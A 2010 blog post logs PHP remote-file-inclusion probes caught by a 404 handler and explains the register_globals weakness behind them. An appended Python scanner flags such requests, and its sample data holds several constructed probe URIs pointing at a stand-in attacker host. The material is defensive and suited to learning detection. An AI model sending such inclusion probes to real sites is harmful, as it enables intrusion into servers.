Thursday, February 4, 2010

Examples of ongoing web site injection attacks I am experiencing

I'm no security professional. When it comes to security, my eyes glaze over and I feel lost. But to get a better feel for the broken links at my sites, I recently edited my .htaccess file to include this line:

ErrorDocument 404 /404.php

Then I put this line into my 404.php:

mail('',"$_SERVER[REQUEST_URI] file not found at","Referred by: $_SERVER[HTTP_REFERER]\nREMOTE_ADDR: $_SERVER[REMOTE_ADDR]");

What followed from there was a startling procession of mails showing me repeated waves of php injection and hijacking attacks. I intend to log interesting samples here:

2010 February 4

This is apparently a random url sent in the hope that I may have a main.php file that will accept this remote page to display and do more mischief. I wager this is a signature vulnerability of some popular web software package.

I do have phpGedView installed at my site. This is apparently an attempt to take advantage of the php setting register_globals=on to set the phpGedView internal base directory variable to a remote site, then do some sort of command line and file mischief with php scripts at that remote site. This is probably a known vulnerability with some phpGedView set-ups. register_globals has long been recommended to be off, not on, due to this type of vulnerability. register_globals being on lets HTML GET and POST variables be registered as regular php global variables, which obviously can wreak havoc with the workings of your scripts. See wikibooks for a better explanation.

2010 February 11

This one is guessing I have an errors.php file that will do something fun with the url they are providing.
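The probes logged above (main.php, errors.php, and the phpGedView base-directory attempt) share one shape: a query-string parameter whose value is an absolute URL on some other host, which is what a script with register_globals on would feed straight into include() or require(). The following script, added here as an example and not part of the original post, scans 404-handler log lines for that shape. The log line format (space-separated ADDR=, REF=, URI= fields carrying the same three values the 404.php mailer captures), the sample lines, the hostnames and the parameter names (dir, base_dir, error) are all constructed for the example; none are taken from the post or from phpGedView.

```python
"""Scan 404-handler log lines for remote-file-inclusion (RFI) style probes.

A request whose query parameter is itself a URL (http://, https://, ftp://,
or scheme-relative //) is the hallmark of an attempt to make a PHP
include()/require() pull code from another host. Flagging those lines
separates the probes from ordinary broken links.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines (not from the original post). Format is an
# assumption: one request per line, KEY=VALUE fields, same three values the
# 404.php mailer records. Hostnames, addresses and parameter names are made up.
SAMPLE_LOG = """\
ADDR=192.0.2.10 REF=- URI=/main.php?dir=http://attacker.invalid/id.txt?
ADDR=192.0.2.11 REF=- URI=/pgv/index.php?base_dir=http%3A%2F%2Fattacker.invalid%2Fpgv%2F
ADDR=192.0.2.12 REF=http://search.example/?q=genealogy URI=/old/page.html
ADDR=192.0.2.13 REF=- URI=/errors.php?error=//attacker.invalid/e.txt
ADDR=192.0.2.14 REF=- URI=/images/logo.png
"""

# Matches values that point at another host: explicit scheme or "//host/..."
REMOTE_URL = re.compile(r"^(?:(?:https?|ftp):)?//", re.IGNORECASE)


def parse_line(line):
    """Turn 'K=V K=V ...' into a dict; only the first '=' of each field splits."""
    fields = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def remote_params(uri):
    """Return [(name, value)] for query parameters whose value is a remote URL.

    parse_qsl percent-decodes, so an encoded http%3A%2F%2F... is caught too.
    The referer header is deliberately not inspected: a URL there is normal.
    """
    query = urlsplit(uri).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if REMOTE_URL.match(value.strip())
    ]


def scan(log_text):
    """Return one finding per suspicious parameter: (addr, path, name, value)."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        fields = parse_line(line)
        uri = fields.get("URI", "")
        for name, value in remote_params(uri):
            findings.append((fields.get("ADDR", "?"), urlsplit(uri).path, name, value))
    return findings


if __name__ == "__main__":
    for addr, path, name, value in scan(SAMPLE_LOG):
        print(f"{addr} probed {path} with {name}={value}")
```

Run against the sample, the three probe lines are reported and the two genuine broken links (including the one that arrived with a search-engine referer) are not. The same check can be dropped into the 404 handler itself so that only the flagged requests generate mail; on a server where register_globals cannot be turned off, the real fix remains keeping allow_url_include (and, on older PHP, allow_url_fopen) disabled so that a URL in an include path is refused regardless of which script is probed.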
